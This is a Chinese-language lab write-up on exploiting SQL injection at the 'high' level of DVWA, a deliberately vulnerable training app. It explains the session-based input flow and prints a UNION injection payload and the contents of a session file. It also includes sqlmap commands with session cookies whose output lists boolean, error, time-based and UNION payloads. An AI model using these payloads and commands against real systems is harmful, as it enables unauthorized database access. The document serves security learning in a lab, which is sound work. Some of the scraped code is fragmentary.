2019-2-26 dvwa学习(3)--sql注入级别high和session

2019-2-26 dvwa学习(3)–sql注入级别high和session

2019-2-26 dvwa学习(3)--sql注入级别high和session_第1张图片
high级别页面,点击"here to change your ID",会打开另外一个网页(session-input.php),然后输入3,提交,在主页面上会显示数据。
2019-2-26 dvwa学习(3)--sql注入级别high和session_第2张图片

 $page[ 'body' ] .= "Click here to change your ID.";

以上代码表示点击"here to change your ID",会打开session-input.php页面


"; $page[ 'body' ] .= "Session ID: {$_SESSION[ 'id' ]}

"; $page[ 'body' ] .= ""; } $page[ 'body' ] .= "

"; dvwaSourceHtmlEcho( $page ); ?>

3.$_POST[ ‘id’ ]如果存在,会赋值给预定义的$_SESSION[ ‘id’ ]。而session信息是保留在服务器上。注意:此时在session中保留的就是以下信息

1' union select column_name,column_type from information_schema.columns where table_name='users' and table_schema='dvwa'#


root@1cae08f0d608:/var/lib/php/sessions# ls -l
total 4
-rw------- 1 www-data www-data 246 Feb 27 01:09 sess_mtnslp6slj5aup7n1tqh2ouc72
root@1cae08f0d608:/var/lib/php/sessions# cat sess_mtnslp6slj5aup7n1tqh2ouc72
dvwa|a:2:{s:8:"messages";a:0:{}s:8:"username";s:5:"admin";}id|s:121:"1' union select column_name,column_type from information_schema.columns where table_name='users' and table_schema='dvwa'#";session_token|s:32:"b6bc30f8d87d2e146baaff5e5a1c

4.在界面上显示Session ID:


require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/sqli/source/{$vulnerabilityFile}";


Something went wrong.
' ); // Get results while( $row = mysqli_fetch_assoc( $result ) ) { // Get values $first = $row["first_name"]; $last = $row["last_name"]; // Feedback for end user $html .= "
ID: {$id}
First name: {$first}
Surname: {$last}
"; } ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); } ?>

在这里,只要$_SESSION[ ‘id’ ]存在,那就会执行数据库查询。step1时候,不存在$_SESSION[ ‘id’ ],所以不执行;而在step2中,session-input.php中保存了$_SESSION[ ‘id’ ],此时开始执行数据库查询。
high级别查询安全性甚至都不如medium级别,并没有用mysqli_real_escape_string转义特殊字符。只是用“LIMIT 1”来限制数据显示条数,显然是可以被注入的"#"来屏蔽的。



2019-2-26 dvwa学习(3)--sql注入级别high和session_第3张图片


C:\Python27\sqlmap>sqlmap.py -u "" --data "id=1 & Submit=Submit " --cookie "PHPSESSID=mtnslp6slj5aup7n1tqh2ouc72; security=high" --batch -D dvwa --tables
 ___ ___[(]_____ ___ ___  {}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 17:14:27 /2019-02-26/

[17:14:27] [INFO] resuming back-end DBMS 'mysql'
[17:14:27] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (POST)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: id=(SELECT (CASE WHEN (1426=1426) THEN 1 ELSE (SELECT 4462 UNION SELECT 4808) END))&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=1 AND (SELECT 5505 FROM(SELECT COUNT(*),CONCAT(0x71786a6271,(SELECT (ELT(5505=5505,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)&Submit=Submit

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x71786a6271,0x597353525655566d6d4577594e7a79776b7863416a6e6d4c50654f50676d457a4979794759456458,0x717a6b6b71),NULL-- HLAr&Submit=Submit
[17:14:27] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL >= 5.0
[17:14:27] [INFO] fetching tables for database: 'dvwa'
[17:14:27] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries). Falling back to partial UNION technique
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [WARNING] the SQL query provided does not return any output
[17:14:27] [INFO] fetching number of tables for database 'dvwa'
[17:14:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:14:27] [INFO] retrieved:
[17:14:27] [WARNING] time-based comparison requires larger statistical model, please wait............ (done)
[17:14:27] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[17:14:27] [WARNING] unable to retrieve the number of tables for database 'dvwa'
[17:14:28] [ERROR] unable to retrieve the table names for any database
do you want to use common table existence check? [y/N/q] N
No tables found
[17:14:28] [INFO] fetched data logged to text files under 'C:\Users\xxx\AppData\Local\sqlmap\output\'

[*] ending @ 17:14:28 /2019-02-26/




C:\Python27\sqlmap>sqlmap.py -u "" --second-url "" --data "id=1 & Submit=Submit " --cookie "PHPSESSID=mtnslp6slj5aup7n1tqh2ouc72; security=high" -D dvwa -T users --tables --batch
 ___ ___[']_____ ___ ___  {}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 15:48:31 /2019-02-27/

[15:48:32] [INFO] resuming back-end DBMS 'mysql'
[15:48:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
Parameter: id (POST)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=a'' ' UNION ALL SELECT CONCAT(CONCAT('qkzpq','AnAobpxMEVvrQhDbPUwYvCTponUepPqCpwoBwMDl'),'qpqqq'),NULL-- weNx& Submit=Submit
[15:48:32] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9.0 (stretch)
web application technology: Apache 2.4.25
back-end DBMS: MySQL 5 (MariaDB fork)
[15:48:32] [INFO] fetching tables for database: 'dvwa'
Database: dvwa
[2 tables]
| guestbook |
| users     |

[15:48:32] [INFO] fetched data logged to text files under 'C:\Users\xxx\AppData\Local\sqlmap\output\'

[*] ending @ 15:48:32 /2019-02-27/

